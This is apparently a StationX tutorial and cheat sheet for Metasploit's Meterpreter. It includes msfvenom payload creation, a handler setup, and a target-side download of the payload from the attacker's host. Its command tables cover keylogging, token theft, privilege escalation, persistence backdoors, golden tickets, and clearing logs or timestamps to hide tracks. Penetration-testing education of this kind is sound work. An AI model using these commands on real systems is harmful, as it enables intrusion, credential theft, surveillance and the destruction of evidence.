Meterpreter Commands List (2024 Update)

Meterpreter Commands

If you’ve dabbled with Metasploit, you’re likely aware that it contains a command-line tool called Meterpreter, which stands for “Metasploit Interpreter”. 

This advanced payload has been part of Metasploit since 2004 and has C, PHP, Python, and Java implementations. 

However, if you want to start with Meterpreter but don’t know where to begin, we’ve got you covered.

In this article, we’ll review what a Meterpreter shell is, whether it’s better than a reverse shell, and various categories of Meterpreter commands, including file manipulation, network surveillance, privilege escalation, and even remote access to the target machine’s hardware components such as its monitor. 

Without further ado, let’s dive in.

What Is a Meterpreter Shell?

Once you’ve successfully exploited a target with Metasploit, the Meterpreter shell appears in the terminal of your attacking machine, granting you access to the target machine.

Many tutorials exist on spawning Meterpreter shells

The method that led to the screenshots below comes from using msfvenom to generate an executable file, which gets downloaded to the target machine via the virtual machine bridged adapter. 

By double-clicking on the executable file, the target connects to the attacker.

The commands used on the attacking machine (Kali Linux):

msfvenom -p windows/meterpreter_bind_tcp LPORT=443 -f exe -o bind.exe

python3 -m http.server 8000

exploit multi/handler

use payload windows/meterpreter_bind_tcp

set rhost [target-ipv4]

exploit

The commands used on Powershell of the Windows target machine:

wget [attacker-ipv4]:8000/bind.exe -o bind.exe

netstat -an | findstr 443

Let’s briefly compare a Meterpreter shell and a standard reverse shell.

Is a Meterpreter Shell Better Than a Standard Reverse Shell?

Meterpreter has more functions and is more flexible than a standard reverse shell

Through it, you can access a webcam or microphone remotely, or easily upload and use Mimikatz—through a module called “kiwi,” which is another pen-testing framework.

It also allows you to execute Metasploit modules directly on a target machine rather than write code to the target disk and run it there.

On the other hand, Meterpreter is such a widely known hacking tool that, unsurprisingly, antivirus and IDS/IPS solutions have ways to block it from running. 

Additionally, Meterpreter is a Ruby-based framework, while standard reverse shells can use various scripting and shell languages, such as C, Python, Perl, PHP, bash, and Powershell.

Here is a comparison of the features of a Meterpreter shell and a standard reverse shell:

Meterpreter shell
Runs in-memory: injects DLL into existing compromised processes and can migrate to other running processes easily
Can run Metasploit modules/extensions directly without downloading to the target machine
Can customize payloads through Meterpreter scripting in Ruby
Contains functionalities not readily available in standard shells, such as monitor, webcam, and microphone access
Uses encrypted communications to evade detection
Reverse shell
Spawns new processes on the target machine
Opens a standard terminal on the target machine
Functionalities depend on the scripting language used
Requires the target to have the shellcode downloaded beforehand
Firewalls and other security systems easily overlook outgoing signals from reverse shell code executed by the target machine

Meterpreter Commands List

Below we break down the most useful Meterpreter commands into categories. While the full list of commands is massive, the following should provide a reference for the most common and useful ones for you.

System Information and Management Meterpreter Commands

The following core commands will help you gather essential information about the target machine.

CommandExplanation
sysinfoDisplay system information. Learn about the target machine’s operating system, architecture, and other basic details.
getuidDisplay user ID. The target machine identifies you as this user.
getpidDisplay the process ID with which Meterpreter is running. By keeping this process alive, you maintain access to your target.
psList and display running processes on the target machine. The ps command identifies vulnerable applications on the target.
bg/background (Ctrl+Z)Put the current Meterpreter session in the background. After using this command, you can run other exploits from the attacking machine.
Meterpreter commands sysinfo, getuid, getpid, ps, bgbackground
Meterpreter commands: sysinfo, getuid, getpid, ps, bg/background

Networking Meterpreter Commands

These networking commands in Meterpreter help you understand the target’s network structure.

CommandExplanation
arpDisplay the host ARP cache. You can use ARP spoofing to assess the security of a network and identify vulnerabilities.
getproxyDisplay the current proxy configuration. You can obfuscate hacking activities or improve your security posture by using proxies.
portfwdForward packets from a local port to a remote service. This pivoting command relays TCP connections to and from the target machine, granting the attacker direct access.
routeView and modify the network routing table. You can use this to conduct attacks such as routing table poisoning and hijacking.
ifconfig/ipconfigShow network interface configuration. Either command displays a system’s basic networking information, such as IP addresses.
Meterpreter commands arp, getproxy, portfwd
Meterpreter commands: arp, getproxy, portfwd
Meterpreter commands route, ifconfig
Meterpreter commands: route, ifconfig

File System Operations Meterpreter Commands

These commands manipulate files and directories on the attacking (local) and target (remote) machines. Many bash or Windows cmd file system commands apply to Meterpreter, and commands prefixed with the small letter “l” (as in “local”) apply to the attacking machine.

CommandExplanation
ls/llsList all remote/local files. Use this to navigate the target and attacking machines to know what exploits to launch and where to launch them.
pwd/lpwdPrint the current remote/local working directory. If you’re running a server on your attacking machine, such as using the command python3 -m http.server 8000, you’ll know which directory your target connects to.
upload/downloadUpload/download a file or directory from local/remote to remote/local. Although Meterpreter doesn’t require writing anything to the target disk, this pair of commands may be helpful for executing shellcode on and saving files from the target.
rm/delDelete remote files. Either command works on Windows and Linux targets alike. It is especially useful for covering your tracks and cleaning up post-exploitation, and the best part is that nothing deleted using these commands goes into the target’s recycling bin.
show_mountList all mount points/logical drives. The list includes hard drives, optical disk drives, and network drives, and you can exploit such vulnerabilities.
Meterpreter commands ls, upload, pwd, lpwd, show_mount, rm, del
Meterpreter commands: ls, upload, pwd, lpwd, show_mount, rm, del

User and Group Management Meterpreter Commands

Some of these commands, such as add_user, require the Meterpreter extension incognito (use incognito). Tokens are temporary keys allowing you to access the target machine and network without providing credentials. This and the next section on Privilege Escalation concern the use of tokens.

CommandExplanation
add_userAttempt to add a user with all tokens to the target system. You can use this command to create a backdoor. Later, you can remove it through a shell with admin privileges. In Windows, it’s cmd > net user [username] /delete.
add_group_userAttempt to add a user to a global group on a host with all accessible tokens. The purpose of this command is to allow the new user to inherit the group’s privileges.
getprivsAttempt to enable all privileges available to the current process on the target. You gain more control and access to the system.
list_tokensList all accessible tokens and their privilege level using the options -u to sort by unique user name and -g by unique group name.
impersonate_tokenInstruct the Meterpreter thread to impersonate the specified token. Everything you do from this point onward on the entire system is in the context of that token.
Meterpreter commands add_group_user, add_user, impersonate_token, list_tokens, getuid, guid, getprivs
Meterpreter commands: add_group_user, add_user, impersonate_token, list_tokens, getuid, guid, getprivs

Privilege Escalation Meterpreter Commands

Here are a few explicit Meterpreter commands that can elevate the attacker’s privilege in the target machine. It would help if you loaded the “privs” extension before using the “getsystem” command.

CommandExplanation
getsystemAttempt to elevate your privilege to that of the target (local) system. You can gain admin- or root-level access with the command.
steal_token [PID]Attempt to steal an impersonation token from the target process marked by PID. Usually, you aim for a user with higher privileges so that you can control the process.
drop_token [PID]Relinquishes any active impersonation token. Using this command drops a specified privilege token from the current process PID, reducing the level of privileges.
rev2selfAttempt to revert to the original token, which will be useful after privilege escalation. This command helps if you’ve made a mistake escalating to the wrong set of privileges.
Meterpreter commands steal_token, drop_token, rev2self, list_tokens. Note that rev2self yields no terminal output.
Meterpreter commands: steal_token, drop_token, rev2self, list_tokens. Note that rev2self yields no terminal output.

Persistence and Lateral Movement Meterpreter Commands

Hackers need to learn how to maintain a Meterpreter session and move across different virtual spaces for greater flexibility and to evade detection. The Kiwi extension in Meterpreter is Mimikatz 2.0.

CommandExplanation
run [persistence]Run a Meterpreter payload [persistence] on the target machine to maintain access or create a persistent backdoor. Persistence is especially key for conducting prolonged attacks in stealth.

Meterpreter command Windows:
exploit/windows/local/persistence

Meterprter command Linux:
exploit/linux/local/service_persistence, exploit/linux/local/cron_persistence (or similar)
use kiwiLoad the Kiwi (Mimikatz 2.0) module onto the current Meterpreter session. You must run this command before using any Kiwi commands below.
kiwi_cmd [option]Execute an arbitrary Mimikatz command (unparsed) via Meterpreter. The help menu comes with some fun commands, and if you’re familiar with Mimikatz, you’ll love this.
golden_ticket_create [options]Create a golden Kerberos ticket. The namesake refers to the all-access golden ticket in the novel Charlie and the Chocolate Factory.
Unlike an ordinary “ticket granting ticket” (TGT) issued through the Kerberos Key Distribution Center (KDC), a golden Kerberos ticket allows you to bypass vital layers of authentication and can be dangerous in the wrong hands.
run autorouteInsert routes for the target to Metasploit’s routing table so that Metasploit knows how to route traffic through the session. The autoroute module is another pivot.

The general use of the run command is to execute a Meterpreter script.

Sometimes, this command may generate warning messages. Alternatively, use the command run post/multi/manage/autoroute instead.
Meterpreter commands run autoroute -s
Meterpreter commands: run autoroute -s
Meterpreter commands run persistence, use kiwi
Meterpreter commands: run persistence, use kiwi
Kiwi commands
Kiwi commands
Meterpreter commands kiwi_cmd coffee
Meterpreter commands: kiwi_cmd coffee
Kiwi command golden_ticket_create
Kiwi command: golden_ticket_create

Capture and Exfiltration Meterpreter Commands

Here are a few user interface commands to transfer data from the target machine. The help menu (meterpreter > help) lists other commands for hijacking the target’s sound system and webcams, such as play, record_mic, and webcam_list.

CommandExplanation
screenshotGrab a screenshot of the target’s interactive desktop. Keep a record of your observations on the target machine for security audits.
screenshareWatch the remote user’s desktop in real time. This command is helpful when your attack takes place over some time, such as several hours, and you want to see how it unfolds.
keyscan_start/keyscan_stopStart/stop capturing keystrokes on the target. Keyscan functions as a keylogger and tracks the target’s keyboard input.
keyscan_dumpDump buffer of keystrokes on the target. Use this command between keyscan_start and keyscan_stop to see what the target user has been typing.
enumdesktopsList all accessible desktops (separate graphical environments) and Windows stations of the target. Each item on the list has a session ID to which you can apply Meterpreter commands specific to a particular desktop.
Capture and Exfiltration Meterpreter Commands
Meterpreter commands: getdesktop, enumdesktops, screenshot, screenshare, and more. The webcam_list and record_mic commands returned error messages because the target virtual machine didn’t have those. The attacker has a screen capture of the Windows target, and behind the kali@kali terminal, you can watch the target’s real-time monitor display.
Meterpreter commands keyscan_start, keyscan_dump, keyscan_stop, and a second screenshare
Meterpreter commands: keyscan_start, keyscan_dump, keyscan_stop, and a second screenshare
The display on the target machine after executing the second screenshare
The display on the target machine after executing the second screenshare

Defensive Evasion Meterpreter Commands

During ethical hacking, the target system may catch you red-handed. What can you do to prevent such an outcome or minimize your damage?

CommandExplanation
clearevClear the event logs on the target system. You can’t afford to leave traces of your break-in there, so you must remove all your digital footprints before exiting the target machine.
timestompManipulate timestamps of affected files to cover your tracks. This command is a wordplay on “timestamp” and “stomp” as if to stomp out metadata changes as if nothing’s ever happened.
migrateMove the Meterpreter session to another process. You’d use this command often for stealth because it’s in your best interest to keep the Meterpreter shell connection alive for as long as possible.
uictlFreeze the keyboard, mouse, or both on the target machine. The options are enable/disable keyboard/mouse/all. You can cover your tracks while the target user wonders what’s going on.
Meterpreter commands clearev, timestomp, migrate, uictl
Meterpreter commands: clearev, timestomp, migrate, uictl

Miscellaneous Commands Meterpreter Commands

Here are some useful Meterpreter commands belonging to one or more categories above.

CommandExplanation
shellDrop into a system command shell. You can execute (reverse) shell code from the terminal of the target machine as if you were a legitimate user.
executeExecute a command. You can execute (reverse) shell code on the target machine without entering the shell.

Usage: execute -f [file] [options]

The options are:
-H: Create the process hidden from view
-a: The arguments to pass to the command
-c: Channelized I/O (required for interaction)
-d: The ‘dummy’ executable to launch when using -m
-f: The executable command to run
-h: Help menu
-i: Interact with the process after creating it
-m: Execute from memory
-t: Execute the process using the currently impersonated thread token
help/?Display the Meterpreter help menu. Learn new Meterpreter commands and refresh your memory on those you’ve understood.
localtimeDisplay the local date and time of the target system. This information is crucial to minimize the amount of suspicious data on the target machine.
idletimeDisplay the number of seconds the user has been idle on the remote system. This command is useful because you may encounter timeouts on your target machine, which can hinder you from completing attacks or covering your tracks.
Meterpreter commands shell, execute, help, localtime, idletime
Meterpreter commands: shell, execute, help, localtime, idletime

Conclusion

We hope this list of Meterpreter commands helps you get started with Meterpreter shell commands and wield Meterpreter like a pro. Those interested in ethical hacking and penetration testing would benefit from mastery of Meterpreter.

Don’t forget to check out our StationX Membership to access a wide range of ethical hacking, penetration testing, and related courses. If you intend to pursue a career in these fields, we have handpicked a selection of courses for you below, and we wish you success.

Frequently Asked Questions

Level Up in Cyber Security: Join Our Membership Today!

vip cta image
vip cta details
  • Cassandra Lee

    Cassandra is a writer, artist, musician, and technologist who makes connections across disciplines: cyber security, writing/journalism, art/design, music, mathematics, technology, education, psychology, and more. She's been a vocal advocate for girls and women in STEM since the 2010s, having written for Huffington Post, International Mathematical Olympiad 2016, and Ada Lovelace Day, and she's honored to join StationX. You can find Cassandra on LinkedIn and Linktree.

>